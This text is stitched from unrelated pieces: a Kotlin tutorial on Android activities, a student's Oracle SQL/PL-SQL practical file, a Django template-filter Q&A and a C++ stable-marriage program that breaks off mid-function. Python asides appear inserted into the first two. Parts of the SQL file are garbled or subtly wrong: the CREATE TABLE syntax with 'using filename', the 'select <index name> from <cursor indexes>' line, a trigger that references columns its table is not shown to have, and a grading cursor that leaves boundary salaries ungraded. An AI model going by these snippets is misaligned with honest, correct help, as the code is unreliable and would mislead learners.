Introduction to Android Activities with Kotlin

Update Note: This tutorial has been updated to Kotlin and Android Studio 3.0 by Joe Howard. The original tutorial was written by Namrata Bandekar.

When you make an Android app, it's pretty likely that the first thing you'll do is plot and plan how you'll take over the world. Just kidding. Actually, the first thing you do is create an Activity, and in this tutorial you'll get hands-on experience with activities. In addition, you'll use the (newly official) Kotlin programming language and Android Studio 3.0. You'll need to use Kotlin 1.1.3 or later and Android Studio 3.0 Canary 5 or later.

This tutorial assumes you're familiar with the basics of Android development. If you're completely new to Kotlin, XML or Android Studio, you should take a look at the Beginning Android Development Series and Kotlin For Android: An Introduction before you start.

Getting Started

Download and extract the starter project for this tutorial. Open Android Studio 3.0 or later, and choose Open an existing Android Studio project. Then select the project you just extracted. Build and run, and you'll see the app's single to-do list screen. Your mission is to liven up this screen by making the to-do list modifiable.

An activity's lifetime is managed through a set of callbacks that the OS invokes as the activity changes state:

- onCreate(): Called by the OS when the activity is first created. This is where you do your general activity startup, such as initializing UI elements.
- onStart(): Called just before the activity becomes visible to the user. In here, you generally should start UI animations, audio based content or anything else that requires the activity's contents to be on screen.
- onResume(): As an activity enters the foreground, this method is called. Here you have a good place to restart animations, update UI elements, restart camera previews, resume audio/video playback or initialize any components that you release during onPause().
- onPause(): This method is called before sliding into the background. Here you should stop any visuals or audio associated with the activity such as UI animations, music playback or the camera. This method is followed by onResume() if the activity returns to the foreground or by onStop() if it becomes hidden.
- onStop(): This method is called right after onPause(), when the activity is no longer visible to the user, and it's a good place to save data that you want to commit to the disk. It's followed by either onRestart(), if this activity is coming back to the foreground, or onDestroy() if it's being released from memory.
- onRestart(): Called after stopping an activity, but just before starting it again. It's always followed by onStart().
- onDestroy(): This is the final callback you'll receive from the OS before the activity is destroyed. You can trigger an activity's destruction by calling finish(), or it can be triggered by the system when the system needs to recoup memory. If your activity includes any background threads or other long-running resources, destruction could lead to a memory leak if they're not released, so you need to remember to stop these processes here as well.

Note: You do not call any of the above callback methods directly in your own code (other than superclass invocations); you only override them as needed in your activity subclasses. They are called by the OS when a user opens, hides or exits the activity.

So many methods to remember! In the next section, you'll see some of these lifecycle methods in action, and then it'll be a lot easier to remember what everything does.

Configuring an Activity

Keeping the activity lifecycle in mind, take a look at an activity in the sample project. Open MainActivity.kt, and you'll see that the class with its onCreate() override looks like this:

class MainActivity : AppCompatActivity() {

  // 1
  private val taskList: MutableList<String> = mutableListOf()
  private val adapter by lazy { makeAdapter(taskList) }

  override fun onCreate(savedInstanceState: Bundle?)
  {
    // 2
    super.onCreate(savedInstanceState)

    // 3
    setContentView(R.layout.activity_main)

    // 4
    taskListView.adapter = adapter

    // 5
    taskListView.onItemClickListener =
        AdapterView.OnItemClickListener { parent, view, position, id -> }
  }

  // 6
  fun addTaskClicked(view: View) {

  }

  // 7
  private fun makeAdapter(list: List<String>): ArrayAdapter<String> =
      ArrayAdapter(this, android.R.layout.simple_list_item_1, list)
}

Here's a play-by-play of what's happening above:

- You initialize the activity's properties, which include an empty mutable list of tasks and an adapter initialized using by lazy.
- You call onCreate() on the superclass; remember that this is (usually) the first thing you should do in a callback method. There are some advanced cases in which you may call code prior to calling the superclass.
- You set the content view of your activity with the corresponding layout file resource.
- Here you set up the adapter for taskListView. The reference to taskListView is initialized using Kotlin Android Extensions, on which you can find more info here. This replaces findViewById() calls and the need for other view-binding libraries.
- You add an empty OnItemClickListener() to the ListView to capture the user's taps on individual list entries. The listener is a Kotlin lambda.
- An empty on-click method for the "ADD A TASK" button, designated by the activity_main.xml layout.
- A private function that initializes the adapter for the list view. Here you are using the Kotlin = syntax for a single-expression function.

Note: To learn more about ListViews and Adapters, refer to the Android Developer docs.

Your implementation follows the theory in the previous section: you're doing the layout, adapter and click listener initialization for your activity during creation.

Starting an Activity

In its current state, the app is a fairly useless lump of ones and zeros because you can't add anything to the to-do list. You have the power to change that, and that's exactly what you'll do next.
In the MainActivity.kt file you have open, add a property to the top of the class:

private val ADD_TASK_REQUEST = 1

You'll use this immutable value to reference your request to add new tasks later on. Then add this import statement at the top of the file:

import android.content.Intent

And add the following implementation for addTaskClicked():

val intent = Intent(this, TaskDescriptionActivity::class.java)
startActivityForResult(intent, ADD_TASK_REQUEST)

When the user taps the "ADD A TASK" button, the Android OS calls addTaskClicked(). Here you create an Intent to launch the TaskDescriptionActivity from MainActivity.

Note: There will be a compile error since you have yet to define TaskDescriptionActivity.

You can start an activity with either startActivity() or startActivityForResult(). They are similar, except that startActivityForResult() will result in onActivityResult() being called once the TaskDescriptionActivity finishes. You'll implement this callback later so you can know if there is a new task to add to your list or not.

But first, you need a way to enter new tasks in Forget Me Not; you'll do so by creating the TaskDescriptionActivity.

Note: Intents are used to start activities and pass data between them. For more information, check out the Android: Intents Tutorial.

Creating an Activity

Android Studio makes it very easy to create an activity. Just right-click on the package where you want to add the activity; in this case, the package is com.raywenderlich.android.forgetmenot. Then navigate to New\Activity, and choose Empty Activity, which is a basic template for an activity.

On the next screen, enter TaskDescriptionActivity as the Activity Name, and Android Studio will automatically fill the other fields based on that. Click Finish and put your hands in the air to celebrate. You've just created your first activity!

Android Studio will automatically generate the corresponding resources needed to create the activity.
These are:

- Class: The class file is named TaskDescriptionActivity.kt. This is where you implement the activity's behavior. This class must subclass the Activity class or an existing subclass of it, such as AppCompatActivity.
- Layout: The layout file is located under res/layout/ and named activity_task_description.xml. It defines the placement of different UI elements on the screen when the activity is created.

The layout file created from the Empty Activity template in Android Studio 3.0 defaults to using a ConstraintLayout for the root view group. For more information on ConstraintLayout, please see the Android developer docs here.

In addition to this, you will see a new addition to your app's AndroidManifest.xml file:

<activity android:name=".TaskDescriptionActivity"></activity>

The activity's name is relative to the app package (hence the period at the beginning).

Now build and run the app. When you tap on ADD A TASK, you're presented with your newly generated activity! Looking good, except for the fact that it's lacking substance. Now for a quick remedy to that!

In your newly generated TaskDescriptionActivity, paste the following into your class file, overwriting anything else except the class declaration and its brackets.

// 1
companion object {
  val EXTRA_TASK_DESCRIPTION = "task"
}

// 2
override fun onCreate(savedInstanceState: Bundle?) {
  super.onCreate(savedInstanceState)
  setContentView(R.layout.activity_task_description)
}

// 3
fun doneClicked(view: View) {

}

Note: You can quickly fix any missing imports that Android Studio complains about by placing your cursor on the item and pressing Option-Enter.

Here, you've accomplished the following:

- Used the Kotlin companion object for the class to define attributes common across the class, similar to static members in Java.
- Overridden the onCreate() lifecycle method to set the content view for the activity from the layout file.
- Added an empty click handler that will be used to finish the activity.
Jump over to your associated layout in res/layout/activity_task_description.xml and replace everything with the following (the attribute lists were lost in this copy; only the elements and the id and click handler referenced by the tutorial's code are shown):

<?xml version="1.0" encoding="utf-8"?>
<android.support.constraint.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android" ...>

    <TextView ... />

    <EditText android:id="@+id/descriptionText" ... />

    <Button android:onClick="doneClicked" ... />

</android.support.constraint.ConstraintLayout>

Here you change the layout so there is a TextView prompting for a task description, an EditText for the user to input the description, and a Done button to save the new task.

Run the app again, tap ADD A TASK and your new screen will look a lot more interesting.

Stopping an Activity

Just as important as starting an activity with all the right methods is properly stopping it.

In TaskDescriptionActivity.kt, add these imports, including one for Kotlin Android Extensions:

import android.app.Activity
import android.content.Intent
import kotlinx.android.synthetic.main.activity_task_description.*

Then add the following to doneClicked(), which is called when the Done button is tapped in this activity:

// 1
val taskDescription = descriptionText.text.toString()
if (!taskDescription.isEmpty()) {
  // 2
  val result = Intent()
  result.putExtra(EXTRA_TASK_DESCRIPTION, taskDescription)
  setResult(Activity.RESULT_OK, result)
} else {
  // 3
  setResult(Activity.RESULT_CANCELED)
}
// 4
finish()

You can see a few things are happening here:

- You retrieve the task description from the descriptionText EditText, where Kotlin Android Extensions has again been used to get references to view fields.
- You create a result Intent to pass back to MainActivity if the task description retrieved in step one is not empty. Then you bundle the task description with the intent and set the activity result to RESULT_OK, indicating that the user successfully entered a task.
- If the user has not entered a task description, you set the activity result to RESULT_CANCELED.
- Here you close the activity.
Once you call finish() in step four, the callback onActivityResult() will be called in MainActivity; in turn, you need to add the task to the to-do list.

Add the following method to MainActivity.kt, right after onCreate():

override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {
  // 1
  if (requestCode == ADD_TASK_REQUEST) {
    // 2
    if (resultCode == Activity.RESULT_OK) {
      // 3
      val task = data?.getStringExtra(TaskDescriptionActivity.EXTRA_TASK_DESCRIPTION)
      task?.let {
        taskList.add(task)
        // 4
        adapter.notifyDataSetChanged()
      }
    }
  }
}

Let's take this step-by-step:

- You check the requestCode to ensure the activity result is indeed for your add task request you started with TaskDescriptionActivity.
- You make sure the resultCode is RESULT_OK, the standard activity result for a successful operation.
- Here you extract the task description from the result intent and, after a null check with the let function, add it to the task list.
- You call notifyDataSetChanged() on the adapter so the list view refreshes with the new task.

Build and run the app, then tap ADD A TASK. This will bring up a new screen that lets you enter a task. Now add a description and tap Done. The screen will close and the new task will be on your list:

Registering Broadcast Receivers

Every to-do list needs to have a good grasp on date and time, so a time display should be the next thing you add to your app.

Open MainActivity.kt and add the following after the existing property declarations at the top:

private val tickReceiver by lazy { makeBroadcastReceiver() }

Then add a companion object near the top of MainActivity:

companion object {
  private const val LOG_TAG = "MainActivityLog"

  private fun getCurrentTimeStamp(): String {
    val simpleDateFormat = SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.US)
    val now = Date()
    return simpleDateFormat.format(now)
  }
}

And initialize the tickReceiver by adding the following to the bottom of MainActivity:

private fun makeBroadcastReceiver(): BroadcastReceiver {
  return object : BroadcastReceiver() {
    override fun onReceive(context: Context, intent: Intent?)
    {
      if (intent?.action == Intent.ACTION_TIME_TICK) {
        dateTimeTextView.text = getCurrentTimeStamp()
      }
    }
  }
}

Here, you create a BroadcastReceiver that sets the date and time on the screen if it receives a time change broadcast from the system. You use getCurrentTimeStamp(), which is a utility method in your activity, to format the current date and time.

Note: If you're not familiar with BroadcastReceivers, you should refer to the Android Developer documentation.

Next add the following methods to MainActivity underneath onCreate():

override fun onResume() {
  // 1
  super.onResume()

  // 2
  dateTimeTextView.text = getCurrentTimeStamp()

  // 3
  registerReceiver(tickReceiver, IntentFilter(Intent.ACTION_TIME_TICK))
}

override fun onPause() {
  // 4
  super.onPause()

  // 5
  try {
    unregisterReceiver(tickReceiver)
  } catch (e: IllegalArgumentException) {
    Log.e(MainActivity.LOG_TAG, "Time tick Receiver not registered", e)
  }
}

Here you do a few things:

- You call onResume() on the superclass.
- You update the date and time TextView with the current time stamp, because the broadcast receiver is not currently registered.
- You then register the broadcast receiver in onResume(). This ensures it will receive the broadcasts for ACTION_TIME_TICK. These are sent every minute after the time changes.
- In onPause(), you first call onPause() on the superclass.
- You then unregister the broadcast receiver in onPause(), so the activity no longer receives the time change broadcasts while paused.

Now build and run the app, and try the following:

- Tap ADD A TASK.
- Enter "Replace regular with decaf in the breakroom" as the task description and tap Done. You'll see your new task in the list.
- Close the app from the recent apps.
- Open the app again. You can see that it forgot about your evil plans.
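Before moving on, it may help to see exactly what getCurrentTimeStamp() produces. As a quick cross-language illustration (not part of the tutorial's project), Java's SimpleDateFormat pattern "yyyy-MM-dd HH:mm" corresponds to the strftime notation below; the function name is mine, not the tutorial's:

```python
from datetime import datetime

def current_time_stamp(now: datetime) -> str:
    # SimpleDateFormat's "yyyy-MM-dd HH:mm" maps to "%Y-%m-%d %H:%M":
    # zero-padded year-month-day plus 24-hour hours and minutes.
    return now.strftime("%Y-%m-%d %H:%M")

print(current_time_stamp(datetime(2017, 10, 5, 9, 30)))  # → 2017-10-05 09:30
```

Because ACTION_TIME_TICK fires once a minute, a minute-granularity format like this is exactly as precise as the display can usefully be.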
Persisting Data Between Launches

Open MainActivity.kt, and add the following properties to the top of the class:

private val PREFS_TASKS = "prefs_tasks"
private val KEY_TASKS_LIST = "tasks_list"

And add the following underneath the rest of your activity lifecycle methods:

override fun onStop() {
  super.onStop()

  // Save all data which you want to persist.
  val savedList = StringBuilder()
  for (task in taskList) {
    savedList.append(task)
    savedList.append(",")
  }

  getSharedPreferences(PREFS_TASKS, Context.MODE_PRIVATE).edit()
      .putString(KEY_TASKS_LIST, savedList.toString()).apply()
}

Here you build a comma separated string with all the task descriptions in your list, and then you save the string to SharedPreferences in the onStop() callback. As mentioned earlier, onStop() is a good place to save data that you want to persist across app uses.

Next add the following to onCreate() below the existing initialization code:

val savedList = getSharedPreferences(PREFS_TASKS, Context.MODE_PRIVATE).getString(KEY_TASKS_LIST, null)
if (savedList != null) {
  val items = savedList.split(",".toRegex()).dropLastWhile { it.isEmpty() }.toTypedArray()
  taskList.addAll(items)
}

Here you read the saved list from the SharedPreferences and initialize taskList by converting the retrieved comma separated string to a typed array.

Still in MainActivity.kt, at the bottom of the class add:

private fun taskSelected(position: Int) {
  // 1
  AlertDialog.Builder(this)
      // 2
      .setTitle(R.string.alert_title)
      // 3
      .setMessage(taskList[position])
      .setPositiveButton(R.string.delete, { _, _ ->
        taskList.removeAt(position)
        adapter.notifyDataSetChanged()
      })
      .setNegativeButton(R.string.cancel, { dialog, _ ->
        dialog.cancel()
      })
      // 4
      .create()
      // 5
      .show()
}

Taking the numbered comments in turn:

- You construct an AlertDialog.Builder for the dialog.
- You set the dialog's title.
- You set the dialog's message to the selected task's description, and add Delete and Cancel buttons with their click handlers.
- You create the dialog from the builder.
- You display the alert dialog to the user.
Update the OnItemClickListener of the taskListView in onCreate():

taskListView.onItemClickListener = AdapterView.OnItemClickListener { _, _, position, _ ->
  taskSelected(position)
}

Your app won't compile, though, until you define some strings. To configure the strings, open res/values/strings.xml and within the resources element add:

<string name="alert_title">Task</string>
<string name="delete">Delete</string>
<string name="cancel">Cancel</string>

Build and run the app. Tap on one of the tasks. You'll see an alert dialog with options to CANCEL or DELETE the task from the list:

Now try rotating the device. (Make sure you have rotation in the device settings set to auto-rotate.) As soon as you rotate the device, the alert dialog is dismissed. This makes for an unreliable, undesirable user experience; users don't like it when things just vanish from their screen without reason. The dialog disappears because the system destroys and recreates the activity on a configuration change. You can prevent the restart by declaring that your activity handles the change itself, as follows.

In AndroidManifest.xml, find the start tag:

<activity android:name=".MainActivity">

And change it to:

<activity
    android:name=".MainActivity"
    android:configChanges="orientation|screenSize">

Here, you declare that your MainActivity will handle any configuration changes that arise from a change in orientation or screen size. This simple line prevents a restart of your activity by the system, and it passes the work to MainActivity.

You can then handle these configuration changes by implementing onConfigurationChanged(). In MainActivity.kt, add the following method after onStop():

override fun onConfigurationChanged(newConfig: Configuration?) {
  super.onConfigurationChanged(newConfig)
}

Here you're just calling the superclass's onConfigurationChanged() method, since you're not updating or resetting any elements based on screen rotation or size.

onConfigurationChanged() is passed a Configuration object that contains the updated device configuration. By reading fields in this newConfig, you can determine the new configuration and make appropriate changes to update the resources used in your interface.

Now, build and run the app and rotate the device again.
This time, the alert dialog stays on screen after the rotation. You've now had hands-on experience with the activity lifecycle. You covered quite a few concepts, including:

- How to create an activity
- How to start an activity
- How to stop an activity
- How to persist data when an activity stops
- How to work around a configuration change

Team

Each tutorial at raywenderlich.com is created by a team of dedicated developers so that it meets our high quality standards. The team members who worked on this tutorial are:

- Author: Joe Howard
- Author: Namrata Bandekar
- Tech Editor: Kyle Gorlick
- Final Pass Editor: Matt Luedke
https://www.raywenderlich.com/165824/introduction-android-activities-kotlin
Submitted To: Er. Gunjan Oberoi (Deptt. Of CSE)
Submitted By: Nitish Kamal, D3 CSE (A2), 95065/90370305200

INDEX

01. To Execute Various Queries Using Commands Of SQL
02. To Use A Loop In SQL
03. To Find Out The Area Of A Circle When Radius Is Given
04. Introduction To Views
05. Program To Create And Drop An Index
06. Introduction To Packages
07. Introduction To Triggers
08. Write A Program To Find Salary Grade Using Cursor
09(a). Create Or Replace Procedure My_Proc
09(b). Create Table Mytable (Num_Col Number, Char_Col Varchar2(60))

PRACTICAL NO. 1
TO EXECUTE VARIOUS QUERIES USING COMMANDS OF SQL

(1) To create an employee table with the fields employee name, department name and salary. You must create your tables before you can enter data into them, using the CREATE TABLE command. Syntax:

Create table tablename using filename (fieldname fieldtype(length), fieldname fieldtype(length), fieldname fieldtype(length));

(2) To add the following fields to the employee table: employee number, date of birth, phone number. The ALTER TABLE statement allows you to rename an existing table; it can also be used to add, modify or drop a column from an existing table. To add a column to an existing table, the ALTER TABLE syntax is:

ALTER TABLE table_name ADD column_name column-definition;

(3) To modify the width of a field in the employee table. You can use the MODIFY clause if you need to resize a column in MySQL. It is written as:

alter table table_name modify [column name] VARCHAR(size);

By doing this you can allow more or fewer characters than before. For example, alter table people modify name VARCHAR(35) changes the column called "name" on the table called "people" to now allow 35 characters.
(4) To insert values in the employee table. The SQL INSERT INTO clause facilitates the process of inserting data into a SQL table. Here is how you can insert a new row into the Weather table:

INSERT INTO Weather VALUES ('Los Angeles', 20, '10/10/2005')

You can produce the same result with a slightly modified SQL INSERT INTO syntax, listing the columns explicitly:

INSERT INTO Weather (City, AverageTemperature, Date) VALUES ('Los Angeles', 20, '10/10/2005')

When using SQL INSERT INTO you might not want to enter values for all columns, and in this case you have to specify the list of columns you are entering values for. The following SQL INSERT example enters only 2 of the 3 columns in the Weather table:

INSERT INTO Weather (City, Date) VALUES ('Boston', '10/10/2005')

If you do not enter values for all columns, then the columns you have omitted must allow NULL values or at least have a default value defined.

(5) To insert various records into the employee table without repeating the INSERT command. Instead of using the INSERT INTO command again and again, we can insert a bulk of data by specifying the columns of the table and creating an input interface; the data values entered there are inserted into the table.

(6) To update the records in the employees table where the employee name is "neha". The SQL UPDATE clause serves to update data in a database table. Its basic syntax looks like this:

UPDATE Table1 SET Column1 = Value1, Column2 = Value2, ...

(7) To increase the salary of all the employees by Rs. 12000. The salary of the employees in the table can be increased by adding an equal amount to the salary column of each employee, so the query we execute raises every salary by Rs. 12000; the corresponding changes are shown by again displaying all the contents of the table.

(8) To delete a particular record from the employees table.
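The INSERT, UPDATE and DELETE commands from practicals (4) through (8) can be tried outside Oracle too. The sketch below uses Python's built-in sqlite3 module against an in-memory database; the employees schema and values are illustrative, not the practical's actual data:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE employees (name TEXT, dept TEXT, salary INTEGER)")

# INSERT with an explicit column list: the omitted dept column gets NULL
cur.execute("INSERT INTO employees (name, salary) VALUES ('neha', 10000)")
# INSERT supplying all columns, so no column list is needed
cur.execute("INSERT INTO employees VALUES ('ram', 'CSE', 9000)")

# UPDATE a particular record selected by a WHERE clause, as in (6)
cur.execute("UPDATE employees SET salary = 15000 WHERE name = 'neha'")
# Raise every salary by the same amount, as in (7)
cur.execute("UPDATE employees SET salary = salary + 12000")

# DELETE a particular record, as in (8)
cur.execute("DELETE FROM employees WHERE name = 'ram'")

rows = cur.execute("SELECT name, salary FROM employees").fetchall()
print(rows)  # → [('neha', 27000)]
```

Running the statements in this order shows how each DML command narrows or widens its effect purely through the presence or absence of a WHERE clause.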
The SQL DELETE clause is used to delete data from a database table. The simplest SQL DELETE syntax looks like this:

DELETE FROM Table1

The SQL DELETE statement above will delete all data from the Table1 table. Most of the time we will want to delete only table rows satisfying certain search criteria defined in the SQL WHERE clause, and that is what we do in this particular query.

(9) To delete all the records from the employee table. Here we use DELETE without a WHERE clause, which means the query will delete all the data from the table. The structure of the table will still remain stored in the database, so in case we want to again enter data values in the same table, we can do that.

(10) To drop the employee table. Sometimes we may decide that we need to get rid of a table in the database for some reason; it would be problematic if we could not do so, because this could create a maintenance nightmare for the DBAs. Fortunately, SQL allows us to do it with the DROP TABLE command. The syntax for DROP TABLE is:

DROP TABLE "table_name"

So, if we wanted to drop the table called customer that we created in the CREATE TABLE section, we simply type DROP TABLE customer. After we have dropped the table, the data as well as the structure of the table is deleted, so if we perform any transaction on the dropped table, the query will give an error saying that the table doesn't exist.

(11) To view all the records of the employee table.

(12) To make changes permanent to the database. The COMMIT command executes a SQL COMMIT command. All changes made in your database session are committed, whether they were made through Oracle OLAP or through another form of access (such as SQL) to the database. The COMMIT command only affects changes in workspaces that you have attached in read/write access mode. When you want changes that you have made in a workspace to be committed when you execute the COMMIT command, you must first update the workspace using the UPDATE command.
UPDATE moves changes from a temporary work area to the database table in which the workspace is stored; changes that have not been moved to the table are not committed. After the command returns, all committed changes are visible to other users who subsequently attach the workspace.

(13) To undo uncommitted changes in the database. The ROLLBACK command aborts the current transaction. Syntax:

ROLLBACK [WORK]

ROLLBACK rolls back the current transaction and causes all the updates made by the transaction to be discarded. WORK has no special sense and is supported for compatibility with SQL standards only.

(14) To give access rights to a user on a particular database. Once we've added users to our database, it's time to begin strengthening security by adding permissions. Our first step will be to grant appropriate database permissions to our users; we'll accomplish this through the use of the SQL GRANT statement. Here's the syntax of the statement:

GRANT <permissions> [ON <table>] TO <user/role> [WITH GRANT OPTION]

(15) To take rights from a user on a table. Once we've granted permissions, it often proves necessary to revoke them at a later date. Fortunately, SQL provides us with the REVOKE command to remove previously granted permissions. Here's the syntax:

REVOKE [GRANT OPTION FOR] <permissions> ON <table> FROM <user/role>

(16) To add a NOT NULL constraint on the salary column of the table. By default, a table column can hold NULL values. The NOT NULL constraint enforces a column to NOT accept NULL values, i.e. it enforces a field to always contain a value. This means that you cannot insert a new record, or update a record, without adding a value to this field.
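To see a NOT NULL constraint reject a blank value in practice, here is a small sketch using Python's sqlite3 module (the table and column names are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
# salary is declared NOT NULL, so every row must supply a value for it
cur.execute("CREATE TABLE emp (name TEXT, salary INTEGER NOT NULL)")

cur.execute("INSERT INTO emp (name, salary) VALUES ('a', 5000)")  # accepted

try:
    # salary omitted, so it would default to NULL and violate the constraint
    cur.execute("INSERT INTO emp (name) VALUES ('b')")
    violated = False
except sqlite3.IntegrityError:
    violated = True

print(violated)  # → True
```

The failed INSERT leaves the table untouched: only the first, complete row is stored.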
Now whenever we try to leave blank the column where the NOT NULL constraint is applied, an error is raised.

PRACTICAL NO. 2
TO USE A LOOP IN SQL

Declare
  i number := 0;
Begin
  Loop
    i := i + 2;
    exit when i > 10;
  end loop;
  dbms_output.put_line('loop exited as the value of i has reached ' || to_char(i));
end;

Output:-

PRACTICAL NO. 3
TO FIND OUT THE AREA OF A CIRCLE WHEN RADIUS IS GIVEN

create table areas(radius number(5), area number(14,2));

declare
  pi constant number(4,2) := 3.14;
  radius number(5);
  area number(14,2);
begin
  radius := 3;
  while radius <= 7 loop
    area := pi * power(radius, 2);
    insert into areas values(radius, area);
    radius := radius + 1;
  end loop;
end;

Output:

PRACTICAL NO 4
INTRODUCTION TO VIEWS

VIEW: A view is a virtual table which provides access to a subset of columns from one or more tables: the dynamic result of one or more relational operations operating on base relations to produce a new relation. A view is a list of columns or a series of records retrieved from one or more existing tables, or a combination of one or more views and one or more tables. It is a query stored as an object in the database which does not have its own data.

Create a view:
create view v_nominees as select nominee_no, acct_fd_no, name from nominee_mstr;

Inserting values in a view:
insert into v_nominees values ('n100', 'sb432', 'ram');

Displaying the view:

Updating values in a view:
update v_nominees set name='vaishali' where name='sharan';

Deleting values from a view:
delete from v_nominees where name='vaishali';

Dropping a view:
drop view v_nominees;

PRACTICAL NO 5
PROGRAM TO CREATE AND DROP AN INDEX

Theory: there are two types of indexes, simple index and composite index.

Simple index:
create index <index name> ON <table name> (<column name>);
example: create index idxveriEmpno ON acct_mstr (veri_emp_no);

Composite index:
create index <index name> ON <table name> (<column name1>, <column name2>);
example: create index idxtransAcctno ON trans_mstr (trans_no, acctNo);
Viewing indexes:
select <index name> from <cursor indexes>

Unique index:
create unique index <index name> ON <table name> (<column name>, <column name>);

Function based index:
Create index <index name> ON <table name> (<function>(<column name>));
Example: create index idx_name ON cust_mstr (upper(fname));

Reverse key index:
create index <index name> ON <table name> (<column name>) reverse;

Alter index (for example, if a reverse index is rebuilt into a normal index):
Alter index <index name> rebuild noreverse;

Dropping an index:
Drop index <index name>;

PRACTICAL NO 6
INTRODUCTION TO PACKAGES

Create or replace package body operation as

  procedure insert_oper (Eno number, name varchar, job varchar, sal number, Dno number) is
  Begin
    Insert into emp (empno, ename, job, sal, deptno) values (Eno, name, job, sal, Dno);
  End insert_oper;

  Procedure retrieve (Eno in number, Name out varchar, sal out number) is
  Begin
    Select ename, sal into name, sal from emp where empno = Eno;
  End retrieve;

  Function update_oper (Dno number, amount number) Return number is
    N number;
  Begin
    Update emp set sal = sal + amount where deptno = Dno;
    N := SQL%RowCount;
    Return(N);
  End update_oper;

  Function Delete_oper (Eno number) return char is
  Begin
    Delete emp where empno = Eno;
    If SQL%Found Then
      Return('y');
    Else
      Return('n');
    End if;
  End delete_oper;

End operation;

Output:-

PRACTICAL NO 7
INTRODUCTION TO TRIGGERS

Program to explain the working of a trigger. First, create the salgrade table that the trigger reads from:

Create table salgrade (
  grade number(5),
  losal number(10),
  hisal number(10),
  job_classification number(10)
);
Create or replace trigger salary_check
Before insert or update of sal, job ON emp99
for each row
Declare
  Minsal number(10);
  Maxsal number(10);
  Salary_out_of_range exception;
Begin
  Select losal, hisal into minsal, maxsal
    from salgrade where job_classification = :new.job;
  If (:new.sal < minsal or :new.sal > maxsal) then
    Raise salary_out_of_range;
  End if;
Exception
  When salary_out_of_range then
    Raise_application_error(-20300, 'salary ' || to_char(:new.sal) || ' out of range for ' || 'job classification ' || :new.job || ' for employee ' || :new.Ename);
  When no_data_found then
    Raise_application_error(-20322, 'invalid job classification ' || :new.job_classification);
End;

OUTPUT:

PRACTICAL NO 8
WRITE A PROGRAM TO FIND SALARY GRADE USING CURSOR

Declare
  Cursor csal is Select empno, sal from emp;
  Eno emp.empno%type;
  Esal emp.sal%type;
  Grade varchar(2);
Begin
  Open csal;
  Loop
    Fetch csal into eno, esal;
    exit when csal%notfound;
    If esal > 2500 and esal < 3500 then grade := 'C'; end if;
    If esal > 3500 and esal < 4500 then grade := 'B'; end if;
    If esal > 4500 and esal < 5500 then grade := 'A'; end if;
    If esal > 5500 then grade := 'A+'; end if;
    dbms_output.put_line(eno || ' has ' || grade || ' grade');
  end loop;
end;

OUTPUT:-

PRACTICAL NO 9(a)

CREATE OR REPLACE PROCEDURE MY_PROC AS
begin
  dbms_output.put_line('hello world');
end my_proc;

begin
  my_proc;
end;

OUTPUT

PRACTICAL NO 9(b)

CREATE TABLE MYTABLE (NUM_COL NUMBER, CHAR_COL VARCHAR2(60));

create or replace procedure insertIntoTemp as
  v_num1 number := 1;
  v_string1 varchar2(50) := 'hello world!';
  v_outputstr varchar2(50);
begin
  insert into mytable(num_col, char_col) values (v_num1, v_string1);
  select char_col into v_outputstr from mytable where num_col = v_num1;
  dbms_output.put_line(v_outputstr);
end insertIntoTemp;

begin
  insertIntoTemp;
end;

OUTPUT:-
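Practical 8's grading logic can also be stated as a plain function. This Python sketch mirrors the cursor program's salary bands; the employee rows are illustrative, and half-open comparisons are used so that boundary salaries such as 3500 are not left ungraded, which the original's paired strict inequalities would do:

```python
def salary_grade(sal):
    # Same bands as the PL/SQL cursor program, checked from the top down.
    if sal > 5500:
        return "A+"
    if sal > 4500:
        return "A"
    if sal > 3500:
        return "B"
    if sal > 2500:
        return "C"
    return "none"

# Illustrative (empno, sal) rows, standing in for "Select empno, sal from emp"
for eno, sal in [(101, 2600), (102, 4000), (103, 5000), (104, 6000)]:
    print(eno, "has", salary_grade(sal), "grade")
```

Folding the bands into one top-down chain also removes the original's need for four independent IF statements per row.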
https://www.scribd.com/doc/85187889/Reference-Practicle-file-for-RDBMS-II
I'm using Google App Engine and Django templates. I have a table of objects that I want to display; the objects look something like:

Items = [item1, item2]
Users = [{name='username', item1=3, item2=4}, ...]

<table>
  <tr align="center">
    <th>user</th>
    {% for item in result.items %}
      <th>{{item}}</th>
    {% endfor %}
  </tr>
  {% for user in result.users %}
  <tr align="center">
    <td>{{user.name}}</td>
    {% for item in result.items %}
      <td>{{ user.item }}</td>
    {% endfor %}
  </tr>
  {% endfor %}
</table>

I found a "nicer"/"better" solution for getting variables inside the template. It's not the nicest way, but it works: you install a custom filter into Django which gets the key of your dict as a parameter. To make it work in Google App Engine you need to add a file to your main directory; I called mine django_hack.py, and it contains this little piece of code:

from google.appengine.ext import webapp

register = webapp.template.create_template_register()

def hash(h, key):
    if key in h:
        return h[key]
    else:
        return None

register.filter(hash)

Now that we have this file, all we need to do is tell App Engine to use it. We do that by adding this little line to your main file:

webapp.template.register_template_library('django_hack')

And in your template, use this instead of the usual code:

{{ user|hash:item }}

And it should work perfectly =)
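Stripped of the App Engine registration boilerplate, the filter itself is just a guarded dictionary lookup. A plain-Python sketch of the same behaviour (the function name hash mirrors the answer above, even though it shadows the builtin):

```python
def hash(h, key):
    # Return the dict value for key, or None when the key is absent --
    # the same behaviour as the custom template filter in the answer.
    if key in h:
        return h[key]
    return None

# In the template, {{ user|hash:item }} amounts to hash(user, item).
```

This is why missing keys render as empty in the template rather than raising an error: the filter returns None instead of raising KeyError.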
https://codedump.io/share/hP1ZTiVAldsA/1/django-templates-and-variable-attributes
This is a C++ program to solve a matching problem. Given N men and N women, where each person has ranked all members of the opposite sex in order of preference, marry the men and women together such that there are no two people of opposite sex who would both rather have each other than their current partners. If there are no such people, all the marriages are "stable".

Here is the source code of the C++ program to solve a matching problem for a given specific case. The C++ program is successfully compiled and run on a Linux system. The program output is also shown below.

// C++ program for the stable marriage problem
#include <iostream>
#include <string.h>
#include <stdio.h>
using namespace std;

// Number of men or women
#define N 4

// This function returns true if woman 'w' prefers man 'm1' over man 'm'
bool wPrefersM1OverM(int prefer[2*N][N], int w, int m, int m1)
{
    // Check if w prefers m over her current engagement m1
    for (int i = 0; i < N; i++)
    {
        // If m1 comes before m in the list of w, then w prefers her
        // current engagement; don't do anything
        if (prefer[w][i] == m1)
            return true;

        // If m comes before m1 in w's list, then free her current
